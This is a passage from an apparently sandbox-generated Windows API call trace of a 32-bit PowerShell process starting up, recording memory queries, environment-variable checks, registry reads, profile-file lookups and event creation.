RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.396] GetLastError () returned 0xcb [0154.398] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.398] GetLastError () returned 0xcb [0154.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.400] GetLastError () returned 0xcb [0154.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.406] GetLastError () returned 0xcb [0154.410] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.410] GetLastError () returned 0xcb [0154.438] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.440] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.693] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.749] GetLastError () returned 0xcb [0155.324] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x368df0 [0155.325] GetLastError () returned 0x0 [0155.326] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x368e78 [0155.326] GetLastError () returned 0x0 [0155.566] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.643] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.644] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.645] VirtualQuery (in: lpAddress=0x23c474, lpBuffer=0x23d474, dwLength=0x1c | out: lpBuffer=0x23d474*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.774] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.774] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.775] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.775] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.775] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.775] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.775] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.775] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.775] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.775] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.775] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.776] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.776] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.776] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.776] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.776] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.776] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.776] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.776] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.777] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.777] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.777] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.777] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.777] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.777] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.777] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.777] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.777] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.777] VirtualQuery (in: lpAddress=0x23cdc0, lpBuffer=0x23ddc0, dwLength=0x1c | out: lpBuffer=0x23ddc0*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.834] GetLastError () returned 0xcb [0155.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.834] GetLastError () returned 0xcb [0155.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23db6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.834] GetLastError () returned 0xcb [0155.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23db6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.834] GetLastError () returned 0xcb [0155.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23db6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.834] GetLastError () returned 0xcb [0155.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.913] GetLastError () returned 0xcb [0155.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23db6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.913] GetLastError () returned 0xcb [0155.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23db6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.913] GetLastError () returned 0xcb [0155.914] VirtualQuery (in: lpAddress=0x23d0e8, lpBuffer=0x23e0e8, dwLength=0x1c | out: lpBuffer=0x23e0e8*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dbbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.915] GetLastError () returned 0xcb [0155.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23db6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.915] GetLastError () returned 0xcb [0155.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23db6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.915] GetLastError () returned 0xcb [0155.915] VirtualQuery (in: lpAddress=0x23d0e0, lpBuffer=0x23e0e0, dwLength=0x1c | out: lpBuffer=0x23e0e0*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.915] VirtualQuery (in: lpAddress=0x23cd94, lpBuffer=0x23dd94, dwLength=0x1c | out: lpBuffer=0x23dd94*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.915] VirtualQuery (in: lpAddress=0x23cd94, lpBuffer=0x23dd94, dwLength=0x1c | out: lpBuffer=0x23dd94*(BaseAddress=0x23c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.917] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e81c | out: phkResult=0x23e81c*=0x3c8) returned 0x0 [0155.917] RegQueryValueExW (in: hKey=0x3c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e864, lpData=0x0, lpcbData=0x23e860*=0x0 | out: lpType=0x23e864*=0x1, lpData=0x0, lpcbData=0x23e860*=0x56) returned 0x0 [0155.917] RegQueryValueExW (in: hKey=0x3c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e864, lpData=0x357e88, lpcbData=0x23e860*=0x56 | out: lpType=0x23e864*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e860*=0x56) returned 0x0 [0155.918] RegCloseKey (hKey=0x3c8) returned 0x0 [0155.918] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e81c | out: phkResult=0x23e81c*=0x3c8) returned 0x0 [0155.918] RegQueryValueExW (in: hKey=0x3c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e864, lpData=0x0, lpcbData=0x23e860*=0x0 | out: lpType=0x23e864*=0x1, lpData=0x0, lpcbData=0x23e860*=0x56) returned 0x0 [0155.918] RegQueryValueExW (in: hKey=0x3c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e864, lpData=0x357e88, lpcbData=0x23e860*=0x56 | out: lpType=0x23e864*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e860*=0x56) returned 0x0 [0155.918] RegCloseKey (hKey=0x3c8) returned 0x0 [0155.919] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x357e88 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0155.919] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x23e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0155.919] GetLastError () returned 0x3f0 [0155.919] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x357e88 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0155.920] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x23e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0155.920] GetLastError () returned 0x3f0 [0155.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x23e44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0155.921] GetLastError () returned 0x3f0 [0155.921] SetErrorMode (uMode=0x1) returned 0x1 [0155.921] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x23e8cc | out: lpFileInformation=0x23e8cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.921] GetLastError () returned 0x2 [0155.921] SetErrorMode (uMode=0x1) returned 0x1 [0155.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x23e44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0155.921] GetLastError () returned 0x2 [0155.921] SetErrorMode (uMode=0x1) returned 0x1 [0155.921] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x23e8cc | out: lpFileInformation=0x23e8cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.921] GetLastError () returned 0x2 [0155.921] SetErrorMode (uMode=0x1) returned 0x1 [0155.921] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x23e44c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39 [0155.921] GetLastError () returned 0x2 [0155.921] SetErrorMode (uMode=0x1) returned 0x1 [0155.921] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x23e8cc | out: lpFileInformation=0x23e8cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.922] GetLastError () returned 0x3 [0155.922] SetErrorMode (uMode=0x1) returned 0x1 [0155.922] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x23e44c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e [0155.922] GetLastError () returned 0x3 [0155.922] SetErrorMode (uMode=0x1) returned 0x1 [0155.922] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x23e8cc | out: lpFileInformation=0x23e8cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.922] GetLastError () returned 0x3 [0155.922] SetErrorMode (uMode=0x1) returned 0x1 [0155.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.923] GetLastError () returned 0xcb [0155.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.925] GetLastError () returned 0xcb [0155.927] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.927] GetLastError () returned 0xcb [0155.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.928] GetLastError () returned 0xcb [0155.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.929] GetLastError () returned 0xcb [0155.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.940] GetLastError () returned 0xcb [0155.940] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c8 [0155.940] GetLastError () returned 0x0 [0155.940] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x38c [0155.940] GetLastError () returned 0x0 [0155.940] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0 [0155.940] GetLastError () returned 0x0 [0155.940] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4 [0155.940] GetLastError () returned 0x0 [0155.940] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x34c [0155.940] GetLastError () returned 0x0 [0155.941] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x31c [0155.941] GetLastError () returned 0x0 [0155.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b8 [0155.941] GetLastError () returned 0x0 [0155.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324 [0155.941] GetLastError () returned 0x0 [0155.941] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340 [0155.941] GetLastError () returned 0x0 [0155.941] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x350 [0155.941] GetLastError () returned 0x0 [0155.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354 [0155.941] GetLastError () returned 0x0 [0155.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358 [0155.941] GetLastError () returned 0x0 [0155.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.943] GetLastError () returned 0xcb [0155.979] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0155.979] GetLastError () returned 0xcb [0156.052] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x23e90c | out: lpMode=0x23e90c) returned 1 [0156.052] GetLastError () returned 0xcb [0156.053] SetEvent (hEvent=0x3b4) returned 1 [0156.053] GetLastError () returned 0xcb [0156.053] SetEvent (hEvent=0x3c8) returned 1 [0156.053] GetLastError () returned 0xcb [0156.053] SetEvent 